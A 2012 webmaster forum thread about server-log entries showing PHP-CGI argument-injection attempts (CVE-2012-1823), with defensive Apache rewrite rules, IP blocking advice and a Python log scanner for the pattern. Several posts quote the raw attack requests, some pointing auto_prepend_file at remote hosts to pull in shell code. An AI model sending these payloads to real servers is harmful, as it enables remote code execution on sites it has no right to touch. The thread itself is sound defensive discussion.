what is this POST command and why did it get a 200?

   
2:37 pm on May 22, 2012 (gmt 0)



The following showed up in my log. I have no idea what it is doing. Also, this is the only entry in the log for IP 173.73.115.178.

173.73.115.178 - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"

The IP hasn't accessed anything on my site so I don't even know what it is posting in response to.
It looks to me as if it is trying to do something destructive, but I am only guessing.

(I am unsure which forum topic this question belongs in.)
8:58 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



That specific IP had a go at my server a couple of days ago. It got rejected but tried 3 times in all.

All three hits were with the UA...
Mozilla/3.0 (windows)
...same as a hit 15 minutes earlier from an AT&T IP (also blocked) and probably others.

I don't log POSTs in my security logs (they can be far too long!). The QUERYSTRING is the same though, but only on the second and third hits, not the first, which was probably just establishing contact.

I would guess it was trying to add something nasty into a php file on the site. Whether it could succeed depends on how you handle such things - or even whether your site is php in the first place. :)
11:08 pm on May 22, 2012 (gmt 0)



Dstiles: thanks for the reply. I blocked that IP as soon as I saw the log reference.
Is there any way I can determine which php file was involved (short of examining every one of them)?
11:22 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



From the topic header:
why did it get a 200

Was it supposed to get a 403? I've had similar headscratchers, and they tend to come down to UA rewrites. For example, if a nasty robot pretends to be MSIE 5, it will get rewritten to a special page. So it may never meet the later rules that would have kicked in if a normal UA had made the same request.

There are other possible explanations, but they all come down to: Even though logs say 200, your visiting nasty didn't actually get what it wanted.
11:29 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



The /?- start suggests that the root index file was involved.
11:55 pm on May 22, 2012 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month




dupres01 - I would FTP to your account and have a look at files on your server, in particular the PHP folder to see if there have been any new files added. Also you might take a look at the HTML of your online index page and a couple of the other landing pages for any added code, usually at the top or the very bottom.
12:05 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Had the same request two days ago:

173.73.115.178 - - [20/May/2012:22:53:37 +0100] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 403 533 "-" "Mozilla/3.0 (windows)"

was denied based upon incorrect case or syntax on "Windows"
12:13 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



I see that I bounced it purely on the use of underscores in the URL request.

I never use underscores in URLs. This ruling also has the handy effect of blocking direct access to PHP include files as their file names often do have underscores.

If that rule hadn't been there, then the combination of POST and "php" in the URL would have kicked it to the kerb anyway.
1:15 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



I never use underscores in URLs.


Don't recall that I ever have either, although I used one on Saturday for a temp-file-trivia.

What syntax do you use for the denial?
1:21 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



I block "prepend" and "append" anywhere from incoming requests, although I do it myself on the server.
1:36 am on May 23, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Block requests with underscore in path:
RewriteRule _ - [F]


I redirect requests with parameters over to extensionless URLs. The RegEx patterns that capture the parameter values usually allow only lower case letters, numbers and hyphens. Everything else will lead to a 404 error at the very least.
8:42 am on May 23, 2012 (gmt 0)

5+ Year Member



That looks like an attempt to exploit the vulnerability in some PHP-as-CGI setups, which was discussed here and elsewhere a couple of weeks ago.

[php.net...]

It tries to use the PHP -d flag to set two php.ini entries.

The request got a 200 response because it was basically just a request for your home page, with the maliciously-intentioned query string added.
2:09 am on May 24, 2012 (gmt 0)



I have also gotten a similar type of log entry.

177.8.168.n - - "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"

And just now I found an entry that seems in some odd way connected. This visitor has sucuri.net as its initial referer (although that could be bogus). But the IP is coming from linode. And the UAs are bogus. Here are some samples:

97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example HTTP/1.1" 301 249 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example/ HTTP/1.1" 200 22302 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://sucuri.net" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 198 "-" "Ipad Iphone Safari"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 - "h**p://www.bing.com/?s=bin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"

Just seemed odd that this visitor would go from a site about website security and malware to my ecommerce site that had recently seen an attempted exploit and then attempted its own exploit. Like it was doing some testing. Not sure if there is any connection at all, but just thought I would throw it out for your info.

By the way, the 302 redirects are happening, I believe, because my index.php file is a redirect.
3:44 am on May 24, 2012 (gmt 0)

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



gg,

Two things with so-called visitor from 97.107.135.nnn:
1) why on earth are you allowing visitors with "fake Google UAs" (especially this malformed one)?

2) Linode is a server farm:
97.107.128.0 - 97.107.143.255
12:01 pm on May 24, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



OT: More ranges on LINODE server farm.

9:17 pm on May 24, 2012 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



I have a couple of extras on that list...

11:34 am on May 25, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



2012-05-24 19:17:11 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt 80 - 108.49.215.253 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

108.49.215.253 (Verizon Online LLC) trying to inject info3.txt from 81.17.24.82 (privatelayer.com.pa - server farm)
8:18 pm on May 25, 2012 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



81.17.24.82 - not just any server farm. Although only blocked by me in January this year my notes say "listed in uce-protect Level 2 as banned (ie for spam) - robtex claims RU, DNS claims CH and registration address is PA (Panama)". There is no rDNS for the specific IP, unusual for a server farm.

I have the complete 81.17.16.0/20 blocked for the above reasons. It looks very dodgy to me.

Verizon is such a large range (108.0.0.0-108.57.255.255) that anything could happen there - and frequently does. Haven't had so many this year but last year over 50 IPs blocked within that range, some for multiple offences. In all I have blocked around 450 verizon IPs over the past couple of years. Not as bad as Comcast (990) but still nasty.
6:19 am on Jun 29, 2012 (gmt 0)



Just as a little follow-up, here is a sampling of log entries of a similar nature. This is just for your information.

74.55.62.nn - - [03/Jun/2012:13:48:36 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

91.224.160.nnn - - [03/Jun/2012:23:37:41 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51"

85.92.83.nnn - - [05/Jun/2012:10:45:05 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"

213.190.161.nnn - - [23/Jun/2012:12:00:39 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.805"

200.62.177.nn - - [25/Jun/2012:12:55:27 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/id.txt%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

70.84.108.nn - - [25/Jun/2012:17:00:29 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/6.04"
11:49 pm on Jun 29, 2012 (gmt 0)



It has been going on for a while. They are after the latest PHP-CGI remote code execution bug (CVE-2012-1823).

[stopmalvertising.com...]

When PHP is used in a CGI wrapper, remote attackers may use command-line switches, such as -s, -d or -c, in a query string that will be passed to the PHP-CGI binary, leading to arbitrary code execution or source code disclosure.


[eindbazen.net...]

If you are vulnerable the following directive might help:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

Most of them will try an RFI (Remote File Inclusion), which is a shell most of the time.
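A log check for the request pattern described in this post, added here as an example (it is not code from the post or from the linked advisories): it applies the same test as the RewriteCond, a query string that begins with "-" and holds no literal "=", decodes the -d switches, and reports whether the payload is expected in the POST body (php://input) or fetched from a remote URL. It assumes Apache combined log format; the first sample line is the one from the opening post, the benign second line is constructed.

```python
import re
from urllib.parse import unquote_plus

# Same test as the thread's RewriteCond: the query string starts with "-" (or %2d)
# and holds no literal "=", so PHP-CGI would parse it as command-line switches.
ARGV_QUERY = re.compile(r'^(%2d|-)[^=]+$', re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [
    # verbatim from the first post in this thread
    '173.73.115.178 - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don'
    '+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"',
    # constructed benign request with an ordinary key=value query string
    '192.0.2.10 - - [22/May/2012:03:00:00 -0600] "GET /index.php?page=about HTTP/1.1"'
    ' 200 512 "-" "Mozilla/5.0"',
]

def php_cgi_switches(query):
    """Decode the query string and return the php.ini settings passed via -d."""
    decoded = unquote_plus(query)          # '+' -> space, %3d -> '='
    return re.findall(r'-d\s*([A-Za-z_.]+)\s*=\s*(\S*)', decoded)

def analyse(line):
    """Return None for a benign line, otherwise a dict describing the attempt."""
    m = REQUEST_LINE.search(line)
    if not m or '?' not in m.group('target'):
        return None
    query = m.group('target').split('?', 1)[1]
    if not ARGV_QUERY.match(query):
        return None
    settings = dict(php_cgi_switches(query))
    prepend = settings.get('auto_prepend_file', '')
    if prepend.startswith('php://input'):
        payload = 'post-body'       # code arrives in the POST body
    elif re.match(r'https?://', prepend, re.IGNORECASE):
        payload = 'remote-url'      # remote file inclusion
    else:
        payload = 'none'
    return {'method': m.group('method'), 'settings': settings, 'payload': payload}

def scan(lines):
    """Map each flagged log line to (client IP, finding)."""
    hits = []
    for line in lines:
        finding = analyse(line)
        if finding:
            hits.append((line.split()[0], finding))
    return hits
```

Running scan() over a real access log lists the client IPs and the php.ini directives each attempt tried to set, which is what you want before deciding which files to check.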
11:54 pm on Jun 29, 2012 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Couple of quick fixes:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+
RewriteRule .* - [F]
1:44 pm on Jun 30, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



2012-06-30 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt 80 - 83.155.50.106 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

Note that the IP it's pointing to is up by one from my prev post on this. This is from a different site than the prev one.